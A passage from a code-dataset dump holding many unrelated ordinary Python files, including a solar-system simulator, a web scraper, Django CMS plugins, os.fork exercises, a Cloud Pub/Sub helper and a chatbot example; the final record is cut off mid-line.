Resource\n\n\nclass App(Resource):\n \"\"\"A simple abstraction over a Swimlane app.\"\"\"\n\n def __init__(self, fields):\n \"\"\"Init an App with fields.\n\n Args:\n fields (dict): A dict of fields and values\n \"\"\"\n super(App, self).__init__(fields)\n\n def field_id(self, name):\n \"\"\"Get the field ID of a field by name.\n\n Args:\n name (str): The name of the field.\n\n Returns:\n A field ID as a str.\n \"\"\"\n return next((f[\"id\"] for f in self.fields if f[\"name\"] == name), None)\n\n def save(self):\n \"\"\"Create/update the app.\"\"\"\n if hasattr(self, 'id') and self.id:\n self._fields = Client.put(self, 'app/{}'.format(self.id))\n else:\n self._fields = Client.post(self, 'app')\n\n @classmethod\n def find_all(cls):\n \"\"\"List all apps.\n\n Returns:\n A generator that yields all apps in the system.\n \"\"\"\n return (App(x) for x in Client.get(\"app/\"))\n\n @classmethod\n def find(cls, app_id=None, name=None, acronym=None):\n \"\"\"Find an application.\n\n Args:\n app_id (str): The app ID\n name (str): The app name\n acronym (str): The app acronym\n\n Returns:\n A resource that matches the fields\n \"\"\"\n if app_id:\n return App(Client.get(\"app/{0}\".format(app_id)))\n\n else:\n apps = cls.find_all()\n for app in apps:\n if any([\n name and name == getattr(app, 'name', None),\n acronym and acronym == getattr(app, 'acronym', None)\n ]):\n return app\n","sub_path":"swimlane/core/resources/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"261619210","text":"# coding: utf-8\n# license: GPLv3\n\nimport tkinter as tk\nfrom tkinter import filedialog\n\nfrom solar_vis import *\nfrom solar_model import *\nfrom solar_input import *\nfrom solar_graph import *\nimport thorpy\nimport time\nimport numpy as np\n\nroot = tk.Tk()\nroot.withdraw()\n\ntimer = None\n\nalive = True\n\nperform_execution = False\n\"\"\"Flag controlling whether the computation loop keeps running\"\"\"\n\nmodel_time = 0\n\"\"\"Physical time since the start of the computation.\nType: float\"\"\"\n\ntime_scale = 1000.0\n\"\"\"Time step used in the simulation.\nType: float\"\"\"\n\nspace_objects = []\n\"\"\"List of space objects.\"\"\"\n\n\ndef execution(delta):\n \"\"\"Execution function -- runs cyclically, processing all celestial bodies\n and updating their positions on the screen.\n Whether it keeps cycling depends on the value of the global variable perform_execution.\n While perform_execution == True, the function schedules itself on a timer every 1 ms to 100 ms.\n \"\"\"\n global model_time\n global displayed_time\n recalculate_space_objects_positions([dr for dr in space_objects], delta)\n model_time += delta\n\n\ndef start_execution():\n \"\"\"Handler for the Play button click event.\n Starts the cyclic execution of the execution function.\n \"\"\"\n global perform_execution\n perform_execution = True\n\n\ndef pause_execution():\n global perform_execution\n perform_execution = False\n\n\ndef stop_execution():\n \"\"\"Handler for the Quit button click event.\n Stops the cyclic execution of the execution function.\n \"\"\"\n global alive\n alive = False\n\n\ndef open_file():\n \"\"\"Opens a file-selection dialog and calls the function that reads\n the parameters of the celestial-body system from the chosen file.\n The objects that are read in are stored in the global list space_objects\n \"\"\"\n global space_objects\n global browser\n global model_time\n\n file_dir = 
filedialog.askopenfilename(initialdir=\"*\")\n space_objects = read_space_objects_data_from_file(file_dir)\n model_time = 0.0\n max_distance = max([max(abs(obj.x), abs(obj.y)) for obj in space_objects])\n calculate_scale_factor(max_distance)\n\n\ndef handle_events(events, menu):\n global alive\n for event in events:\n menu.react(event)\n if event.type == pg.QUIT:\n alive = False\n\n\ndef slider_to_real(val):\n return np.exp(5 + val)\n\n\ndef slider_reaction(event):\n global time_scale\n time_scale = slider_to_real(event.el.get_value())\n\n\ndef init_ui(screen):\n slider = thorpy.SliderX(100, (5, 15), \"Simulation speed\")\n slider.user_func = slider_reaction\n button_stop = thorpy.make_button(\"Quit\", func=stop_execution)\n button_pause = thorpy.make_button(\"Pause\", func=pause_execution)\n button_play = thorpy.make_button(\"Play\", func=start_execution)\n timer = thorpy.OneLineText(\"Seconds passed\")\n\n button_load = thorpy.make_button(text=\"Load a file\", func=open_file)\n\n box = thorpy.Box(elements=[\n slider,\n button_pause,\n button_stop,\n button_play,\n button_load,\n timer])\n reaction1 = thorpy.Reaction(reacts_to=thorpy.constants.THORPY_EVENT,\n reac_func=slider_reaction,\n event_args={\"id\": thorpy.constants.EVENT_SLIDE},\n params={},\n reac_name=\"slider reaction\")\n box.add_reaction(reaction1)\n\n menu = thorpy.Menu(box)\n for element in menu.get_population():\n element.surface = screen\n\n box.set_topleft((0, 0))\n box.blit()\n box.update()\n return menu, box, timer\n\n\ndef check_graph_availability(objects):\n stars = 0\n planets = 0\n for obj in objects:\n if obj.type == 'Planet':\n planets += 1\n if obj.type == 'Star':\n stars += 1\n if stars == 1 and planets == 1:\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"Main function of the main module.\n Creates the graphical design objects of the tkinter library: the window, canvas, button frame and buttons.\n \"\"\"\n\n global time_step\n global time_speed\n global space\n global start_button\n global perform_execution\n global timer\n\n print('Modelling started!')\n\n pg.init()\n\n output_file = 'output.txt'\n out = open(output_file, 'w')\n out.close()\n\n width = 1400\n height = 800\n screen = pg.display.set_mode((width, height))\n last_time = time.perf_counter()\n drawer = Drawer(screen)\n menu, box, timer = init_ui(screen)\n perform_execution = True\n\n gr = Graph()\n\n while alive:\n gr_drawing_flag = check_graph_availability(space_objects)\n handle_events(pg.event.get(), menu)\n cur_time = time.perf_counter()\n if perform_execution:\n execution((cur_time - last_time) * time_scale)\n text = \"%d seconds passed\" % (int(model_time))\n timer.set_text(text)\n\n last_time = cur_time\n drawer.update(space_objects, box)\n\n write_space_objects_data_to_file(output_file, space_objects, model_time)\n\n if gr_drawing_flag:\n gr.gain_data(space_objects, model_time)\n\n print('Modelling finished!')\n pg.quit()\n\n if gr_drawing_flag:\n gr.show_plot()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solar_main.py","file_name":"solar_main.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"145349961","text":"g = int(input())\nwhile g>0:\n n,k = map(int,input().split())\n a = [int(x) for x in input().split()]\n a.sort()\n count1,count2=0,0\n s = sum(a)\n for i in range(0,k):\n count1 += a[i]\n \n for i in range(n-1,n-k-1,-1):\n count2 += a[i]\n \n print(max(abs(count1-(s-count1)),abs(count2-(s-count2))))\n 
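# One test case handled; decrement the remaining-case counter\n 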
g-=1","sub_path":"python/MAXDIFF.py","file_name":"MAXDIFF.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"359498055","text":"from requests import get\nfrom bs4 import BeautifulSoup\n\nfrom bitflow.utils.module import Module\n\n'''\nA simple scraper that catalogs a list of airfoils to download.\nMakes data scraping more efficient, since multiple airfoils are downloaded in parallel once cataloged.\n'''\n\nTOOLS_URL = \"http://airfoiltools.com\"\nSEARCH_URL = \"http://airfoiltools.com/search/airfoils\"\n\ndef scrape_airfoil_list():\n '''\n Paht's original code, mostly unchanged.\n Parses HTML from airfoiltools.com to get a list of airfoils, and return their names and urls\n '''\n raw_html = get(SEARCH_URL).content\n html = BeautifulSoup(raw_html, 'html.parser')\n airfoilURLList = html.findAll(\"table\", {\"class\": \"listtable\"})\n tableRows = airfoilURLList[0].findAll(\"tr\")\n urls = []\n names = []\n for row in tableRows: # Search through all tables \n airfoil_link = row.find(lambda tag: tag.name==\"a\" and tag.has_attr('href'))\n if (airfoil_link):\n urls.append(TOOLS_URL + airfoil_link['href'])\n names.append(airfoil_link.text.replace(\"\\\\\", \"_\").replace(\"/\",\"_\"))\n return zip(urls, names)\n\n\nclass AirfoilList(Module):\n '''\n Pipeline module for listing airfoil names and urls and feeding them to a downloader\n '''\n def __init__(self, in_label=None, out_label='AirfoilURL', connect_labels=None, name='AirfoilList'):\n Module.__init__(self, in_label, out_label, connect_labels, name)\n\n def process(self):\n for url, name in scrape_airfoil_list():\n yield self.default_transaction(dict(name=name, url=url), uuid=url)\n","sub_path":"modules/airfoils/AirfoilList.py","file_name":"AirfoilList.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"588615106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 10:06:53 2019\n\n@author: naif\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('bigData.csv')\nX=dataset.iloc[:,[1,2,3,4,5]].values\ny=dataset.iloc[:,[6]].values\n#print(X)\n#print(y)\nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\nX[:,1]= le.fit_transform(X[:,1])\nprint(X[:,1])\nX[:,3]= le.fit_transform(X[:,3])\nprint(X[:,3])\nprint(X)\nprint(y)\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\nprint(X_train)\nprint(y_train)\nfrom sklearn.tree import DecisionTreeRegressor\nreg = DecisionTreeRegressor( random_state = 0)\nreg.fit(X_train, y_train)\ny_pred=reg.predict(X_test) \nprint(y_pred)\nfrom sklearn.metrics import mean_squared_error,r2_score\nrms=np.sqrt(mean_squared_error(y_test,y_pred))\nprint(rms)\nr2_score=r2_score(y_test,y_pred)\nprint(r2_score)\n\n# Making the Confusion Matrix\n###rint(cm)","sub_path":"dicision.py","file_name":"dicision.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"77694544","text":"#Imports\nfrom random import randint\nfrom weapon import Weapon\n\n#Globals\n\n\n#Function\nclass Entity():\n \"\"\"docstring for Entity\"\"\"\n def __init__(self, name, health):\n self.name = name\n 
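# Current hit points; max_health below preserves the starting value so healing can be capped\n 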
self.health = health\n self.max_health = health\n self.alive = True\n self.equipped_weapon = False\n self.attack_damage = 0\n self.critical_hit = 1\n\n def is_alive(self):\n if self.health == 0:\n self.alive = False\n return False\n return True\n\n def get_health(self):\n return self.health\n\n def take_damage(self, damage_points):\n\n if self.health <= damage_points:\n self.health = 0\n\n else:\n self.health -= damage_points\n\n return self.health\n\n def take_healing(self):\n\n healing_points = randint(0, self.max_health)\n\n healed = False\n\n if healing_points >= self.max_health - self.health and self.is_alive:\n healing_points -= (self.max_health - self.health)\n self.health += healing_points\n healed = True\n\n elif healing_points <= self.max_health - self.health and self.is_alive:\n self.health += healing_points\n healed = True\n\n else:\n healed\n\n return healed\n\n def has_weapon(self):\n\n return self.equipped_weapon\n\n def equip_weapon(self, weapon):\n self.weapon = weapon\n self.attack_damage = self.weapon.damage\n self.equipped_weapon = True\n\n def attack(self):\n\n if not self.equipped_weapon:\n self.critical_hit = 1\n\n else:\n if self.weapon.critical_hit():\n self.critical_hit = 2\n\n return self.attack_damage * self.critical_hit\n\n\nclass Hero(Entity):\n \"\"\"docstring for Hero\"\"\"\n def __init__(self, name, health, nickname):\n super().__init__(name, health)\n self.nickname = nickname\n self.race = \"Hero\"\n\n def known_as(self):\n return (\"{} {}\".format(self.name, self.nickname))\n\n\nclass Orc(Entity):\n \"\"\"docstring for Orc\"\"\"\n def __init__(self, name, health, berserk_factor):\n super().__init__(name, health)\n self.berserk_factor = berserk_factor\n self.race = \"Orc\"\n\n if self.berserk_factor > 2:\n self.berserk_factor = 2\n else:\n self.berserk_factor = 1\n\n def attack(self):\n\n if not self.equipped_weapon:\n self.critical_hit = 1\n\n else:\n if self.weapon.critical_hit():\n self.critical_hit = 2\n\n return self.attack_damage * self.critical_hit * self.berserk_factor\n","sub_path":"week2/DNP/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"544967937","text":"import json\nfrom os.path import join, dirname, exists\nfrom os import mkdir\n\nfrom pytezos import pytezos\nfrom conseil import conseil\nfrom conseil.api import ConseilApi\nfrom tests import relpath\nfrom tests.templates import big_map_test_case\n\nOperation = conseil.tezos.babylonnet.operations\n\ndata_dir = join(dirname(dirname(__file__)), 'tests/big_map_diff')\n\n\ndef get_transaction_with_big_map_diff(limit=1):\n return Operation.query(Operation.block_level, Operation.operation_group_hash) \\\n .filter(Operation.kind == 'transaction',\n Operation.paid_storage_size_diff > 20,\n Operation.parameters.isnot(None),\n Operation.internal.is_(False)) \\\n .limit(limit) \\\n .all()\n\n\ndef make_test(block_level, operation_group_hash):\n operation_dir = join(data_dir, operation_group_hash)\n if exists(operation_dir):\n return\n else:\n mkdir(operation_dir)\n\n opg = pytezos.shell.blocks[block_level].operations[operation_group_hash]()\n content = opg['contents'][0]\n try:\n big_map_diff = content['metadata']['operation_result']['big_map_diff']\n except (KeyError, IndexError, TypeError):\n return\n\n diff_path = join(operation_dir, 'big_map_diff.json')\n with open(diff_path, 'w+') as f:\n f.write(json.dumps(big_map_diff, indent=2))\n\n script = 
pytezos.shell.contracts[content['destination']]().get('script')\n code_path = join(operation_dir, 'storage_section.json')\n with open(code_path, 'w+') as f:\n f.write(json.dumps(script['code'][1], indent=2))\n\n test_case = big_map_test_case.format(\n case=operation_group_hash[:6],\n code_path=relpath(code_path),\n diff_path=relpath(diff_path)\n )\n with open(join(operation_dir, f'test_big_map_{operation_group_hash[:6]}.py'), 'w+') as f:\n f.write(test_case)\n\n\nif __name__ == '__main__':\n if not exists(data_dir):\n mkdir(data_dir)\n\n for data in get_transaction_with_big_map_diff(limit=400):\n make_test(**data)\n","sub_path":"scripts/make_big_map_tests.py","file_name":"make_big_map_tests.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"618079565","text":"import turtle as t\nimport time\n\n# Draw a sunflower\n\n# Set the line color and fill color; pencolor (pen color) and fillcolor (fill color) can also be set separately\nt.setup(400,400)\nt.color(\"red\",\"yellow\")\n\nt.fd(-150)\nt.begin_fill()\nfor i in range(36):\n t.fd(200)\n t.left(170)\nt.end_fill()\n\nt.hideturtle()\nt.done() # keeps the window open; without this call the window closes automatically\n# t.mainloop() # tell the window to wait for user actions; the window does not close automatically\n\n# Draw a five-pointed star: first draw the edges and fill in red, then outline it in yellow, and finally write some text\n# t.color(\"red\",\"red\")\n# t.begin_fill()\n# for i in range(5):\n# t.fd(200)\n# t.right(144)\n# t.end_fill()\n# t.pensize(5)\n# t.color(\"yellow\")\n# for i in range(5):\n# t.fd(77)\n# t.left(72)\n# t.fd(77)\n# t.right(144)\n#\n# t.penup()\n# t.goto(20,100)\n# t.color(\"red\")\n# t.write(\"My motherland\",font=('Arial',30))\n# t.color(\"violet\")\n# t.goto(-10,-190)\n# t.write(\"Strive for our ideals!\",font=('Arial',30))\n# t.hideturtle()\n#\n# t.mainloop()\n","sub_path":"python_abc/turtle_exercise.py","file_name":"turtle_exercise.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"190025884","text":"from cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\n\nfrom models import DividerPlugin\nfrom models import FeaturedBoxesPlugin, FeaturedBoxesItems\nfrom models import ParallaxPlugin\nfrom models import StandoutItemsPlugin, StandoutItems\nfrom models import CalloutPlugin\n\n\nfrom django.utils.translation import ugettext as _\n\nfrom django.contrib import admin\n\nBASE_TEMPLATE_PATH = 'cms_responsive/'\n\n\nclass CMSDividerPlugin(CMSPluginBase):\n model = DividerPlugin\n name = _(\"Responsive horizontal divider\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-default.html\"\n \n def render(self, context, instance, placeholder):\n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'object':object,\n 'settings': instance\n })\n return context\n\n\n\n\n\n\n# Featured boxes\nclass FeatureBoxesItemsInline(admin.StackedInline):\n model = FeaturedBoxesItems\n\nclass CMSFeaturedBoxesPlugin(CMSPluginBase):\n model = FeaturedBoxesPlugin\n name = _(\"Responsive featured boxes\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-entities.html\"\n inlines = (FeatureBoxesItemsInline,)\n \n def render(self, context, instance, placeholder):\n \n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'entities' : instance.featured_box_items.all(),\n 'object':object,\n 'settings': instance\n })\n return context\n\n\n\n\n\nclass StandoutItemsInline(admin.StackedInline):\n model = StandoutItems\n\nclass CMSStandoutItemsPlugin(CMSPluginBase):\n model = StandoutItemsPlugin\n name = _(\"Responsive standout\")\n render_template 
= BASE_TEMPLATE_PATH + \"plugin/dynamic-entities.html\"\n inlines = (StandoutItemsInline,)\n \n def render(self, context, instance, placeholder):\n \n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'entities' : instance.standout_items.all(),\n 'object':object,\n 'settings': instance\n })\n return context\n\n\n\n\n\n\nclass CMSParallaxPlugin(CMSPluginBase):\n model = ParallaxPlugin\n name = _(\"Responsive Parallax\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-default.html\"\n \n def render(self, context, instance, placeholder):\n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'object':object,\n 'settings': instance\n })\n return context\n \n \n\n\n \nclass CMSCalloutPlugin(CMSPluginBase):\n model = CalloutPlugin\n name = _(\"Responsive callout\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-default.html\"\n \n def render(self, context, instance, placeholder):\n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'object':object,\n 'settings': instance\n })\n return context\n \n\n\nplugin_pool.register_plugin(CMSParallaxPlugin) \nplugin_pool.register_plugin(CMSDividerPlugin)\nplugin_pool.register_plugin(CMSFeaturedBoxesPlugin)\nplugin_pool.register_plugin(CMSStandoutItemsPlugin)\nplugin_pool.register_plugin(CMSCalloutPlugin)\n","sub_path":"cms_responsive/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"238496255","text":"from django.forms import fields, models, formsets, widgets\nfrom .models import Order, OrderedItem\nfrom dal import autocomplete\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, HTML, Button, Row, Field\nfrom crispy_forms.bootstrap import FormActions\n\n\nclass OrderForm(models.ModelForm):\n def __init__(self, *args, **kwargs):\n super(OrderForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n\n self.helper.form_tag = False\n\n self.helper.template = 'bootstrap4/display_form.html'\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderedItemForm(models.ModelForm):\n def __init__(self, *args, **kwargs):\n super(OrderedItemForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n # self.helper.form_class = 'form-horizontal'\n self.helper.template = 'bootstrap3/table_inline_formset.html'\n #self.helper.form_show_labels = False\n self.helper.form_tag = False\n\n # self.helper.form_group_wrapper_class = 'row'\n # self.helper.template = 'bootstrap4/table_inline_formset.html'\n\n class Meta:\n model = OrderedItem\n fields = '__all__'\n widgets = {\n 'product': autocomplete.ModelSelect2(url='formset_demo:product_select')\n }\n","sub_path":"formset_demo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"438887810","text":"import os\nimport time\n\n# pid=os.fork()\n# if pid:\n# print(\"parent...\")\n# time.sleep(60)\n# else:\n# print(\"son...\")\n# time.sleep(15)\n#\n# # watch -n1 ps a\n# start=time.time()\n# print('start...')\n# pid=os.fork()\n# if pid:\n# print('in parent...')\n# print(os.waitpid(-1,0)) # blocks the parent process, so no zombie process is left behind\n# time.sleep(30)\n# else:\n# print('in child')\n# time.sleep(10)\n# end=time.time()\n# print(end-start)\n\n# start=time.time()\n# 
print('start...')\n# pid=os.fork()\n# if pid:\n# print('in parent...')\n# print(os.waitpid(-1,1)) # does not block the parent process, so a zombie process can be left behind\n# time.sleep(30)\n# else:\n# print('in child')\n# time.sleep(10)\n# end=time.time()\n# print(end-start)\n\n# def zb(t):\n# print('in child ...')\n# time.sleep(t)\n# exit()\n#\n# pid=os.fork()\n# if not pid:\n# zb(15)\n#\n# zb(30)\n# import os\n# print(\"hello world\")\n# pid=os.fork()\n# if not pid:\n# print(\"child\")\n# else:\n# print(\"father\")\n#\n# print(\"all\")\n\n# import os\n# for i in range(3):\n# pid=os.fork()\n# if not pid:\n# print(\"child\")\n# exit()\n# print('down')\n\n# import os\n# import time\n# start=time.time()\n#\n# print(\"Start...\")\n# pid=os.fork()\n# if pid:\n# print(\"in parent...\")\n# print(os.waitpid(-1,0))\n# time.sleep(30)\n# else:\n# print(\"in child...\")\n# time.sleep(10)\n#\n# end=time.time()\n# print(end-start)\n\nimport os\nimport time\n\ndef zb(t):\n print(\"in child ...\")\n time.sleep(t)\n exit()\n\npid=os.fork()\nif not pid:\n print('in child ...')\n time.sleep(15)\n exit()\npid=os.fork()\nif not pid:\n print(\"in child2\")\n time.sleep(20)\n exit()\ntime.sleep(25)\nprint(os.waitpid(-1,1))\ntime.sleep(10)","sub_path":"n3_devops/day01/no2_zb.py","file_name":"no2_zb.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"589209105","text":"# Copyright 2015 The Swarming Authors. All rights reserved.\n# Use of this source code is governed by the Apache v2.0 license that can be\n# found in the LICENSE file.\n\n\"\"\"Helper functions for working with Cloud Pub/Sub.\"\"\"\n\nimport base64\nimport logging\nimport re\n\nfrom google.appengine.ext import ndb\nimport webapp2\n\nfrom components import net\n\n\nPUBSUB_BASE_URL = 'https://pubsub.googleapis.com/v1/projects'\nPUBSUB_SCOPES = (\n 'https://www.googleapis.com/auth/pubsub',\n)\n\n\ndef validate_topic(topic):\n \"\"\"Ensures the given topic is valid for Cloud Pub/Sub.\"\"\"\n # Technically, there are more restrictions for topic names than we check here,\n # but the API will reject anything that doesn't match. 
We only check / in case\n # the user is trying to manipulate the topic into posting somewhere else (e.g.\n # by setting the topic as ../..//topics/.\n return '/' not in topic\n\n\ndef validate_project(project):\n \"\"\"Ensures the given project is valid for Cloud Pub/Sub.\"\"\"\n return validate_topic(project)\n\n\ndef ensure_topic_exists(topic, project):\n \"\"\"Ensures the given Cloud Pub/Sub topic exists in the given project.\n\n Args:\n topic: Name of the topic which should exist.\n project: Name of the project the topic should exist in.\n \"\"\"\n try:\n net.json_request(\n '%s/%s/topics/%s' % (PUBSUB_BASE_URL, project, topic),\n method='PUT',\n scopes=PUBSUB_SCOPES,\n )\n except net.Error as e:\n if e.status_code != 409:\n # 409 is the status code when the topic already exists.\n # Ignore 409, but raise any other error.\n raise\n\n\ndef _publish(topic, project, message, **attributes):\n \"\"\"Publish messages to Cloud Pub/Sub.\n\n Args:\n topic: Name of the topic to publish to.\n project: Name of the project the topic exists in.\n message: Content of the message to publish.\n **attributes: Any attributes to send with the message.\n \"\"\"\n net.json_request(\n '%s/%s/topics/%s:publish' % (PUBSUB_BASE_URL, project, topic),\n method='POST',\n payload={\n 'messages': [\n {\n 'attributes': attributes,\n 'data': base64.b64encode(message),\n },\n ],\n },\n scopes=PUBSUB_SCOPES,\n )\n\n\ndef publish(topic, project, message, **attributes):\n \"\"\"Publish messages to Cloud Pub/Sub. Creates the topic if it doesn't exist.\n\n Args:\n topic: Name of the topic to publish to.\n project: Name of the project the topic should exist in.\n message: Content of the message to publish.\n **attributes: Any attributes to send with the message.\n \"\"\"\n try:\n _publish(topic, project, message, **attributes)\n except net.Error as e:\n if e.status_code == 404:\n # Topic does not exist. Try to create it.\n ensure_topic_exists(topic, project)\n try:\n net.json_request(\n '%s/%s/topics/%s' % (PUBSUB_BASE_URL, project, topic),\n method='PUT',\n scopes=PUBSUB_SCOPES,\n )\n except net.Error as e:\n if e.status_code != 409:\n # 409 is the status code when the topic already exists (maybe someone\n # else created it just now). Ignore 409, but raise any other error.\n raise\n # Retransmit now that the topic is created.\n _publish(topic, project, message, **attributes)\n else:\n # Unknown error.\n raise\n\n\nclass PushSubscriptionHandler(webapp2.RequestHandler):\n \"\"\"Base class for defining Pub/Sub push subscription handlers.\"\"\"\n # TODO(smut): Keep in datastore. See components/datastore_utils.\n ENDPOINT = None\n SUBSCRIPTION = None\n SUBSCRIPTION_PROJECT = None\n TOPIC = None\n TOPIC_PROJECT = None\n\n @classmethod\n def _subscribe(cls):\n \"\"\"Subscribes to a Cloud Pub/Sub project.\"\"\"\n net.json_request(\n '%s/%s/subscriptions/%s' % (\n PUBSUB_BASE_URL,\n cls.SUBSCRIPTION_PROJECT,\n cls.SUBSCRIPTION,\n ),\n method='PUT',\n payload={\n 'topic': 'projects/%s/topics/%s' % (cls.TOPIC_PROJECT, cls.TOPIC),\n 'pushConfig': {'pushEndpoint': cls.ENDPOINT},\n },\n scopes=PUBSUB_SCOPES,\n )\n\n @classmethod\n def ensure_subscribed(cls):\n \"\"\"Ensures a Cloud Pub/Sub subscription exists.\"\"\"\n try:\n cls._subscribe()\n except net.NotFoundError:\n # Topic does not exist. 
Try to create it.\n ensure_topic_exists(cls.TOPIC, cls.TOPIC_PROJECT)\n # Retransmit now that the topic is created.\n cls._subscribe()\n except net.Error as e:\n if e.status_code != 409:\n # 409 is the status code when the subscription already exists.\n # Ignore 409, but raise any other error.\n raise\n\n def post(self):\n \"\"\"Handles a Pub/Sub push message.\"\"\"\n # TODO(smut): Ensure message came from Cloud Pub/Sub.\n # Since anyone can post to this endpoint, we need to ensure the message\n # actually came from Cloud Pub/Sub. Unfortunately, there aren't any\n # useful headers set that can guarantee this.\n attributes = self.request.json.get('message', {}).get('attributes', {})\n message = self.request.json.get('message', {}).get('data', '')\n subscription = self.request.json.get('subscription')\n\n if subscription != 'projects/%s/subscriptions/%s' % (\n self.SUBSCRIPTION_PROJECT, self.SUBSCRIPTION):\n self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'\n logging.error('Ignoring unexpected subscription: %s', subscription)\n self.abort(403, 'Unexpected subscription: %s' % subscription)\n return\n\n logging.info(\n 'Received Pub/Sub message:\\n%s\\nAttributes:\\n%s', message, attributes)\n return self.process_message(subscription, message, attributes)\n\n def process_message(self, subscription, message, attributes):\n \"\"\"Process a Pub/Sub message.\n\n Args:\n subscription: Name of the subscription this message is associated with.\n message: The message string.\n attributes: A dict of key/value pairs representing attributes associated\n with this message.\n\n Returns:\n A webapp2.Response instance, or None.\n \"\"\"\n raise NotImplementedError()\n","sub_path":"appengine/components/components/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"247543318","text":"# -*- coding: utf-8 -*-\nfrom chatterbot import ChatBot\n\n# Uncomment the following lines to enable verbose logging\n# import logging\n# logging.basicConfig(level=logging.INFO)\n\n# Create a new instance of a ChatBot\nbot = ChatBot(\n \"SQLMemoryTerminal\",\n storage_adapter='chatterbot.storage.SQLStorageAdapter',\n logic_adapters=[\n \"chatterbot.logic.MathematicalEvaluation\",\n \"chatterbot.logic.TimeLogicAdapter\",\n \"chatterbot.logic.BestMatch\"\n ],\n input_adapter=\"chatterbot.input.TerminalAdapter\",\n output_adapter=\"chatterbot.output.TerminalAdapter\",\n)\n\nprint(\"Type something to begin...\")\n\n# The following loop will execute each time the user enters input\nwhile True:\n try:\n # We pass None to this method because the parameter\n # is not used by the TerminalAdapter\n bot_input = bot.get_response(None)\n\n # Press ctrl-c or ctrl-d on the keyboard to exit\n except (KeyboardInterrupt, EOFError, SystemExit):\n break\n","sub_path":"AnemoNLP/App/MLBot/sql/memory_sql_example.py","file_name":"memory_sql_example.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"685891","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom sklearn.cluster import KMeans\nimport math\nimport random\nimport pickle\nfrom bagger import Bagger\n\n\ncrimes_dict = {0: 'BATTERY', 1: 'THEFT', 2: 'CRIMINAL DAMAGE', 3: 'DECEPTIVE PRACTICE', 4: 'ASSAULT'}\ncrimes_dict_rev = {'BATTERY' : 0, 'THEFT': 1, 'CRIMINAL DAMAGE': 2, 'DECEPTIVE PRACTICE': 3, 'ASSAULT': 4}\nout_str = {\"STREET\", 
